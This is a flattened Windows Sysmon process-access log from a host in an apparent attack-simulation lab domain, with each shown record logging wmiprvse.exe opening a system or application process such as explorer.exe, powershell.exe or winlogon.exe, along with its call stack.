15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535B-6008-4A06-00000000A301}7228C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024563Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024562Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024561Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024560Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024559Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024558Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024557Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024556Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024555Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024554Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024553Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024552Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024551Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024550Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024549Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024548Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024547Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024546Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024545Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024544Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 